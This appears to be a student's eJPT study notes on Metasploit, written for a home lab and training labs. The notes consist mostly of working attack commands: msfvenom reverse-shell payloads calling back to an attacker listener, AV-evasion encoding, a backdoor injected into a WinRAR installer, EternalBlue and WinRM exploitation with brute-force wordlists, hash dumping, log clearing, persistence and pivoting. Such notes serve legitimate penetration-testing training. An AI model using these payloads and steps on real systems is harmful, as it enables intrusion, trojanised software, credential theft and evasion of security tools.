Framework Executable Formats [--format <value>]
===============================================
    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================
    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    nim
    nimlang
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript

Generate a Linux payload with msfvenom

32bit payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx86

64bit payload:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx64

📌 Platform and architecture are auto selected if not specified, based on the selected payload

The transferring method onto the target system depends on the type of the social engineering technique.

e.g. A simple web server can be set up on the attacker system to serve the payload files and a handler to receive the connection back from the target system

cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080

To deal with a meterpreter payload, an appropriate listener is necessary to handle the reverse connection, the multi/handler Metasploit module in this case

msfconsole -q

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

Download the payload on the Windows 2008 system (in this case my home lab VM) from this link
- http://192.168.31.128:8080
- Run the payloadx86.exe payload on the target
The meterpreter session on the attacker machine should be opened

Same example with the linux/x86/meterpreter/reverse_tcp Linux payload executed on the Kali VM.

Encoding Payloads

Signature based Antivirus solutions can detect malicious files or executables. Older AV solutions can be evaded by encoding the payloads.

❗ This kind of attack vector is outdated and hardly used today.
May work on legacy old O.S. like Windows 7 or older.

🗒️ Payload Encoding involves changing the payload shellcode with the aim of changing the payload signature.

🗒️ Shellcode is the code typically used as a payload for exploitation, that provides with a remote command shell on the target system.

msfvenom --list encoders

Excellent encoders are cmd/powershell_base64 and x86/shikata_ga_nai

Windows Payload

Generate a Win x86 payload and encode it with shikata_ga_nai:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

The payload can be encoded as often as desired by increasing the number of iterations.
The more iterations, the better chances to bypass an Antivirus. Use -i option.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

Linux Payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86

Test each of the above generated payloads, like before

cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
msfconsole -q

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

📌 Modern antivirus detects and blocks the encoded payload as soon as the download is started:

Injecting Payloads into PEs

🗒️ (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.

Download a portable executable, e.g.
Payloads can be injected into PEs with msfvenom with the -x and -k options

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.exe

cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
msfconsole -q

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

Transfer and run the winrar.exe file to the target O.S.
File description is kept, but not its functionality.

Proceed with the Post Exploitation module to migrate the process into another one, in the meterpreter session

run post/windows/manage/migrate

Automation with

Repetitive tasks and commands can be automated using MSF resource scripts (same as batch scripts).

Almost every MSF command can be automated.

ls -al /usr/share/metasploit-framework/scripts/resource

e.g. 1

Automate the process of setting up a handler for the generated payloads, by creating a new handler.rc file

nano handler.rc

# Insert the following lines
# by specifying the commands sequentially

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

# Save it and exit

Load and run the recourse script in msfconsole

msfconsole -q -r handler.rc

e.g. 2

nano portscan.rc

# Insert the following lines
# by specifying the commands sequentially

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.31.131
run

# Save it and exit

msfconsole -q -r portscan.rc

e.g. 3

nano db_status.rc

db_status
workspace
workspace -a TEST

msfconsole -q -r db_status.rc

📌 Load up a resource script from within the msfconsole with the resource command

resource /home/kali/certs/ejpt/resource_scripts/handler.rc

Typed in commands in a new msfconsole session, can be exported in a new resource script

makerc /home/kali/certs/ejpt/resource_scripts/portscan2.rc

with MSF

HFS (HTTP File Server)

A HFS (HTTP File Server) is a file and documents sharing web server.

Rejetto HFS - free open source HTTP file server

🔬

SMB - MS17-010 EternalBlue

- EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
- Patch was released in March 2017

🔬 Check the

Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server)

service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.168.31.131
setg RHOST 192.168.31.131
workspace -a EternalBlue

db_nmap -sS -sV -O 192.168.31.131

search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
options
run

search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
options
run

WinRM

Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is 5985 and HTTPS 5986

🔬

service postgresql start && msfconsole -q

db_status
setg RHOSTS 10.2.27.173
setg RHOST 10.2.27.173
workspace -a WinRM

db_nmap -sS -sV -O -p- 10.2.27.173
# Port 5985 is set up for WinRM

search type:auxiliary winrm
use auxiliary/scanner/winrm/winrm_auth_methods
options
run

# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
run

search winrm_script
use exploit/windows/winrm/winrm_script_exec
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit

Apache Tomcat

is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.

Tomcat default TCP port is 8080
Apache web server host HTML/PHP web apps, instead
Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE

🔬

FTP

is an Unix FTP server.

vsftpd v.2.3.4 is vulnerable to a command execution vulnerability

🔬

SAMBA

Samba is the Linux implementation of SMB.

Samaba v.3.5.0 is vulnerable to a RCE vulnerability

🔬

SSH

libssh is a C library that implements the SSHv2 protocol

SSH default TCP port is 22
libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability

🔬

SMTP

is an open source high performance SMTP server developed in Node.js

SMTP default TCP port is 25
- other TCP ports are 465 and 587
Haraka prior to v.2.8.9 is vulnerable to command injection

🔬

with MSF

🗒️ Post Exploitation is the process of gaining further information or access to the target's internal network, after the initial exploitation phase, using various techniques like:

local enumeration
maintaining persistent access
dumping hashes
covering tracks

There are many post exploitation modules provided by the MSF.

🗒️ Persistence consists of techniques used by adversaries to maintain access to systems across restarts, changed credentials, or other interruptions.

🗒️ is the action of (secretly) recording/capturing the keystrokes entered on a target system.

🗒️ Pivoting is a post exploitation technique of using a compromised host, a foothold / plant, to attack other systems on its private internal network.

Fundamentals -

Facilitates the execution of system commands, file system navigation, keylogging
Load custom scripts and plugins dynamically
📌 MSF has various types of Meterpreter payloads based on the target environment

🔬 Check the for various Meterpreter commands and techniques examples and how to upgrade shells to Meterpreter sessions.

Windows PE Modules

Windows post exploitation MSF modules can be used to:

Enumerate user privileges, logged-on users, installed programs, antiviruses, computers connected to a domain, installed patches and shares
VM check

🗒️ Windows Event Logs, accessed via the Event Viewer on Windows, are categorized into:

Application logs - apps startups, crashes, etc
System logs - system startups, reboots, etc
Security logs - password changes, authentication failures/success, etc

Clearing event logs is an important part of the system assessment.

🔬 Check out the with post-exploitation techniques for various Windows services.

Linux PE Modules

Linux post exploitation MSF modules can be used to:

Enumerate system configuration, environment variables, network configuration, user's history
VM check

🔬 Check out the with post-exploitation techniques for various Unix services.

- MSF GUI

🗒️ Armitage is a Java-based GUI front-end for the MSF.

Automate port scanning, exploitation, post exploitation
Visualize targets
Requires MSFdb and services to be running
Pre-packed with Kali Linux

🔬 Port Scanning & Enumeration With Armitage - lab by INE
Victim Machine 1: 10.2.21.86
Victim Machine 2: 10.2.25.150

service postgresql start && msfconsole -q
db_status
	[*] Connected to msf. Connection type: postgresql.

# Open a new tab and start Armitage
armitage
# Answer "YES" for the RPC server

Hosts - Add Hosts
- Add victim 1 IP
- Set the lab as Victim 1
Right-click the target and Scan it

Check Services
Perform an Nmap Scan from the Hosts menu

Check Services

Exploitation

Search for rejetto and launch the exploit module

Try Dump Hashes via the registry method

Saved hashes can be found under the View - Loot menu

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::

Browse Files

Show Processes

Pivoting

Setup Pivoting

Add, Enumerate and Exploit Victim 2

Port forward the port 80 and use nmap

# In the Meterpreter tab
portfwd add -l 1234 -p 80 -r 10.2.25.150

# In the msf Console tab
db_nmap -sV -p 1234 localhost

Remove the created localhost 127.0.0.1
Search for BadBlue and use the badblue_passthru exploit on Victim 2

Migrate to an x64 from the Processes tab
Dump hashes with the lsass method

Armitage Kali Linux Install

sudo apt install armitage -y

sudo msfdb init

sudo nano /etc/postgresql/15/main/pg_hba.conf
# On line 87 switch “scram-sha-256” to “trust”

sudo systemctl enable postgresql
sudo systemctl restart postgresql

sudo armitage